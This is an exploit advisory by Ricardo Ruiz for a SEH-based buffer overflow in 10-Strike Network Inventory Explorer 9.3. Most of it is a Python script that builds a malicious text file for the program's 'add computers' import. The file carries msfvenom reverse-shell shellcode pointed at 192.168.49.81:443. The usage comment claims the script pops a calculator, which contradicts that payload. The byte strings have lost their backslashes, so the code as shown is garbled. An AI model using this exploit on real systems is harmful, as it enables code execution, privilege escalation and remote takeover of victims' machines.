Authored by Ricardo Jose Ruiz Fernandez

10-Strike Network Inventory Explorer versions 9.3 and below are vulnerable to a SEH based buffer overflow which leads to code execution or local privilege escalation. The vulnerable part of the program is the functionality to add computers from a text file.

I. VULNERABILITY
-------------------------
10-Strike Network Inventory Explorer Version 9.3 - Privilege Escalation through SEH based Buffer Overflow


II. VENDOR
-------------------------
10-Strike Network (https://www.10-strike.com/)


III. DESCRIPTION
-------------------------

10-Strike Network Inventory Explorer until latest version (9.3) is vulnerable to a SEH based Buffer Overflow which leads to code execution or local privilege escalation. The vulnerable part of the program is the functionality to add computers from a text file.


IV. EXPLOIT
-------------------------
# Exploit Title: 10-Strike Network Inventory Explorer Version 9.3 - Privilege Escalation through SEH based Buffer Overflow
# Date: 16/08/2022
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor website: https://www.10-strike.com/
# Product website: https://www.10-strike.com/networkinventoryexplorer/
# Usage: Create a file with this script and upload it clicking "Computers" and "Add". It should pop a calculator


from struct import pack


# Bad chars are: x09x0ax0dx3ax5c
badchars = (
b"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
b"x31x32x33x34x35x36x37x38x39x3bx3cx3dx3ex3fx40"
b"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
b"x51x52x53x54x55x56x57x58x59x5ax5bx5dx5ex5fx60"
b"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
b"x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
b"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
b"x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
b"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
b"xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
b"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
b"xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
b"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
b"xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
#b"x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
#b"x01x02x03x04x05x06x07x08x0bx0cx0ex0fx10"
)

# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.49.81 -b "x00x09x0ax0dx3ax5cx11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20x01x02x03x04x05x06x07x08x0bx0cx0ex0fx10" -v payload --smallest -f py
payload = b""
payload += b"x89xe3xdbxd0xd9x73xf4x5bx53x59x49x49"
payload += b"x49x49x49x49x49x49x49x49x43x43x43x43"
payload += b"x43x43x37x51x5ax6ax41x58x50x30x41x30"
payload += b"x41x6bx41x41x51x32x41x42x32x42x42x30"
payload += b"x42x42x41x42x58x50x38x41x42x75x4ax49"
payload += b"x69x6cx79x78x4cx42x43x30x53x30x33x30"
payload += b"x51x70x6ex69x6bx55x30x31x69x50x61x74"
payload += b"x6cx4bx36x30x56x50x4cx4bx50x52x76x6c"
payload += b"x6ex6bx63x62x57x64x4cx4bx32x52x45x78"
payload += b"x34x4fx58x37x32x6ax54x66x56x51x49x6f"
payload += b"x6ex4cx45x6cx43x51x43x4cx74x42x34x6c"
payload += b"x51x30x69x51x5ax6fx76x6dx35x51x68x47"
payload += b"x4dx32x4cx32x32x72x33x67x4ex6bx62x72"
payload += b"x64x50x6ex6bx71x5ax65x6cx6ex6bx70x4c"
payload += b"x54x51x43x48x78x63x53x78x36x61x4ax71"
payload += b"x46x31x4ex6bx30x59x35x70x65x51x49x43"
payload += b"x4cx4bx50x49x34x58x59x73x47x4ax32x69"
payload += b"x6cx4bx66x54x6cx4bx76x61x69x46x75x61"
payload += b"x69x6fx6cx6cx69x51x5ax6fx64x4dx66x61"
payload += b"x6fx37x66x58x39x70x63x45x49x66x64x43"
payload += b"x73x4dx49x68x77x4bx51x6dx66x44x43x45"
payload += b"x5ax44x51x48x6cx4bx56x38x37x54x76x61"
payload += b"x7ax73x35x36x4ex6bx76x6cx30x4bx6cx4b"
payload += b"x46x38x47x6cx56x61x58x53x6ex6bx74x44"
payload += b"x6ex6bx45x51x38x50x6ex69x52x64x51x34"
payload += b"x37x54x33x6bx31x4bx61x71x33x69x51x4a"
payload += b"x62x71x49x6fx6bx50x31x4fx73x6fx33x6a"
payload += b"x4cx4bx62x32x5ax4bx4ex6dx31x4dx63x58"
payload += b"x55x63x55x62x43x30x73x30x73x58x33x47"
payload += b"x44x33x76x52x61x4fx46x34x51x78x42x6c"
payload += b"x34x37x54x66x57x77x79x6fx79x45x6ex58"
payload += b"x6cx50x47x71x75x50x43x30x77x59x38x44"
payload += b"x30x54x36x30x45x38x67x59x6bx30x70x6b"
payload += b"x43x30x79x6fx59x45x52x70x50x50x30x50"
payload += b"x42x70x33x70x56x30x61x50x72x70x53x58"
payload += b"x4ax4ax76x6fx79x4fx79x70x59x6fx79x45"
payload += b"x6dx47x32x4ax47x75x63x58x69x50x69x38"
payload += b"x34x71x33x61x65x38x74x42x45x50x75x51"
payload += b"x6fx4bx4ex69x38x66x31x7ax34x50x46x36"
payload += b"x31x47x32x48x6dx49x49x35x51x64x45x31"
payload += b"x79x6fx69x45x4dx55x4bx70x53x44x56x6c"
payload += b"x49x6fx72x6ex46x68x64x35x78x6cx71x78"
payload += b"x38x70x6dx65x79x32x42x76x49x6fx68x55"
payload += b"x63x58x52x43x30x6dx75x34x33x30x6cx49"
payload += b"x6ax43x63x67x52x77x33x67x50x31x79x66"
payload += b"x30x6ax62x32x53x69x76x36x59x72x4bx4d"
payload += b"x65x36x6bx77x43x74x46x44x37x4cx47x71"
payload += b"x56x61x4ex6dx73x74x77x54x66x70x4ax66"
payload += b"x33x30x43x74x30x54x70x50x51x46x76x36"
payload += b"x36x36x51x56x30x56x30x4ex72x76x62x76"
payload += b"x56x33x56x36x62x48x63x49x6ax6cx75x6f"
payload += b"x4fx76x59x6fx49x45x4dx59x6dx30x52x6e"
payload += b"x70x56x61x56x59x6fx44x70x35x38x53x38"
payload += b"x6cx47x55x4dx61x70x6bx4fx79x45x4dx6b"
payload += b"x7ax50x48x35x4dx72x43x66x50x68x6cx66"
payload += b"x7ax35x4dx6dx6fx6dx59x6fx4bx65x65x6c"
payload += b"x46x66x63x4cx55x5ax6bx30x6bx4bx6dx30"
payload += b"x51x65x75x55x4fx4bx72x67x72x33x52x52"
payload += b"x72x4fx63x5ax35x50x61x43x79x6fx39x45"
payload += b"x41x41"

#buffer = "A"*100000
buffer = b"A"*207
buffer += b"x90x90xebx04" # bp 0x61e4dab1; g
buffer += b"xb1xdaxe4x61"
buffer += b"x90"*2
buffer += payload

with open("test.txt", 'wb') as out:
out.write(buffer)